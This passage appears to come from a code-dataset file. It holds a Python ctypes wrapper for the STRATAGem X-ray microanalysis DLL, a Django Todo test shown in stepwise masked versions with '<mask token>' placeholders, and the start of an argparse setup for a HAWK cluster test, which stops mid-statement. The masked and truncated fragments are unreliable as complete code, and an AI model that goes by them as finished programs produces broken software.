1\n\"\"\"Only characteristic fluorescence\"\"\"\n\nFLUORESCENCE_LINE_CONT = 2\n\"\"\"Characteristic and Bremsstrahlung fluorescence\"\"\"\n\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\nclass 
StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\ndef _check_key(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\SAMx\\Stratagem\\Configuration``. 
If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n\n cwd = os.getcwd()\n try:\n logger.debug(\"dll=%s\", dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd) # Change back to real cwd\n\n logger.debug(\"StEnableErrorDisplay(%r)\", display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {} # layer: index\n self._substrate = None\n self._experiments = {} # experiment: (element, line, kratio) indexes\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n\n logger.debug(\"StObjectNew(key, %r, %i)\", not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error(\"Cannot create object\")\n\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. 
\n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear() # layer: index\n self._substrate = None\n self._experiments.clear() # analyzed experiments\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n 
self._layers.setdefault(layer, index)\n\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = (sample.substrate, index)\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m,\n layer.mass_thickness_kg_m2, layer.density_kg_m3)\n\n return sample\n\n sample = property(get_sample, set_sample, doc=\"Property to set/get sample\")\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n\n logger.debug(\"StSdAddLayer(key)\")\n ilayer_ = self._lib.StSdGetNbLayers(key)\n\n logger.debug(\"StSdAddLayer(key, %i)\", ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error(\"Cannot add layer\")\n\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug(\"StSdAddElt(key, %i, %i)\", ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error(\"Cannot add element\")\n\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug(\"StSdSetNrAtom(key, %i, %i, %i)\", ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error(\"Cannot set atomic number\")\n\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n\n wf_ = c.c_double(wf)\n 
logger.debug(\"StSdSetConc(key, %i, %i, %f)\", ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error(\"Cannot set concentration\")\n\n logger.debug(\"StSdSetConcFlag(key, %i, %i, %i)\", ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):\n self._raise_error(\"Cannot set concentration flag\")\n\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1e3 # g/cm3\n else:\n density = 10.0\n density_ = c.c_double(density)\n\n if thick_known:\n thickness = layer.thickness_m * 1e10 # Angstroms\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n\n logger.debug(\"StSdSetThick(key, %i, %r, %d, %d, %d)\", ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error(\"Cannot set thickness\")\n\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n # Create new object\n key_ = self._stobjectnew(standard=True)\n\n # Set sample\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n\n # Save\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error(\"Cannot save standard\")\n\n # Delete object\n self._lib.StObjectDelete(key_)\n\n self._tmpstandards.append(filepath)\n\n return 
filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1e3)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,\n c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error(\"Cannot add atomic number and line\")\n\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):\n self._raise_error(\"Cannot set standard\")\n\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug(\"StEdSetAnalyzedFlag(key, %i, %r)\", ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error(\"Cannot add experiment analyzed flag\")\n\n kratio_ = c.c_double(experiment.kratio)\n logger.debug(\"StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)\",\n ielt_.value, iline_.value, iexpk_.value,\n experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,\n experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,\n hv_, hv_, kratio_, c.c_double(0.0),\n c.c_int(2)):\n self._raise_error(\"Cannot set experiment k-ratio\")\n\n if experiment.is_analyzed():\n indexes = (ielt_.value, iline_.value, iexpk_.value)\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def 
add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error(\"Cannot set geometry parameters\")\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_),\n c.byref(tilt_), c.byref(azimuth_)):\n self._raise_error(\"Cannot get geometry parameters\")\n\n return toa_.value, tilt_.value, azimuth_.value\n\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n 
:data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n\n prz_mode = property(get_prz_mode, set_prz_mode,\n doc='Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n\n fluorescence = property(get_fluorescence, set_fluorescence,\n doc='Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n\n standard_directory = property(get_standard_directory, set_standard_directory,\n doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer,\n thickness_low_m, thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type 
thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2) # unit in nm\n\n if layer not in self._layers:\n raise ValueError(\"Unknown layer\")\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n # Compute\n low_ = c.c_double(thickness_low_m * 1e9)\n high_ = c.c_double(thickness_high_m * 1e9)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)',\n ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):\n self._raise_error(\"Cannot compute k-ratio vs thickness\")\n\n # Fetch results\n thicknesses = []\n kratios = {}\n\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error(\"Cannot get thickness\")\n thicknesses.append(thick_.value)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n kratios.setdefault(experiment, []).append(k_.value)\n\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. 
\n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n energy_ = c.c_double(energy_high_eV / 1e3)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))\n self._lib.StSetMaxHV(energy_)\n\n # Compute\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error(\"Cannot compute k-ratio vs energy\")\n\n # Fetch results\n energies = []\n kratios = {}\n\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1e3) / step\n\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n\n kratios.setdefault(experiment, []).append(k_.value)\n\n energies.append(hv)\n\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the 
\n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError(\"Thickness of layer %i is unknown\" % i)\n\n # Compute\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n\n _thicknesses, kratios = \\\n self.compute_kratio_vs_thickness(layer, thickness_low_m,\n thickness_high_m, step)\n\n # Reorganize results\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV, step)\n\n kratio = kratios[experiment][-1]\n if (kratio < 0): # Bug in strategem that some energy don't work\n logger.warn(\"STRATAGem returns a negative k-ratio, re-try with energy + 1 eV\")\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n\n output.setdefault(experiment, kratio)\n\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n # Add missing experiments\n zs = set(exp.z for exp in self._experiments.keys())\n\n for layer in list(self._layers.keys()) + [self._substrate[0]]:\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, 
analyzed=False) # dummy\n self.add_experiment(exp)\n\n # Set iteration maximum\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n\n # Compute\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error(\"Cannot start iteration\")\n\n continue_ = c.c_bool(True)\n iteration = 0\n\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n\n if not continue_.value:\n break\n\n logger.debug('Iteration completed')\n\n # Fetch results\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error(\"Cannot get number of elements\")\n\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,\n flag_, wfs_):\n self._raise_error(\"Cannot get layer concentration\")\n\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n\n logger.debug(\"StSdGetThick(key, %i)\", ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),\n c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error(\"Cannot get thickness\")\n\n return (composition, thickness.value / 1e10,\n mass_thickness.value * 10.0, density.value * 1e3)\n\n sample = 
Sample(get_layer(*self._substrate)[0])\n\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n\n # Set scaling\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1e3)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)\n self._lib.StSetScaleHV(maxhv_)\n\n # Compute\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n\n # Get values\n przs = {}\n\n for experiment, indexes in self._experiments.items():\n # Size of each bin\n if maxdepth_m is None:\n # Calculate max depth using Kanaya-Okayama\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1e3\n\n for z, fraction in self._substrate[0].composition.items():\n dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \\\n (z ** 0.89 * mass_density_kg_m3(z) / 1e3)\n maxdepth_m += fraction / (dr * 1e-6)\n\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5 # safety factor\n\n increment_kg_m2 = (maxdepth_m * 
self._substrate[0].density_kg_m3) / bins\n\n # Indexes\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n\n rzs = []\n ys_generated = []\n ys_emitted = []\n\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n\n return przs\n\n",
"step-ids": [
21,
23,
38,
39,
40
]
}
|
[
21,
23,
38,
39,
40
] |
# -*- coding: utf-8 -*-
from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
# todo not saved because mark_done don't save already done todos
self.assertEqual(Todo.objects.count(), 0)
|
normal
|
{
"blob_id": "5c81ddbc8f5a162949a100dbef1c69551d9e267a",
"index": 37,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-4": "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n # todo not saved because mark_done don't save already done todos\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
<|reserved_special_token_0|>
if args.secret:
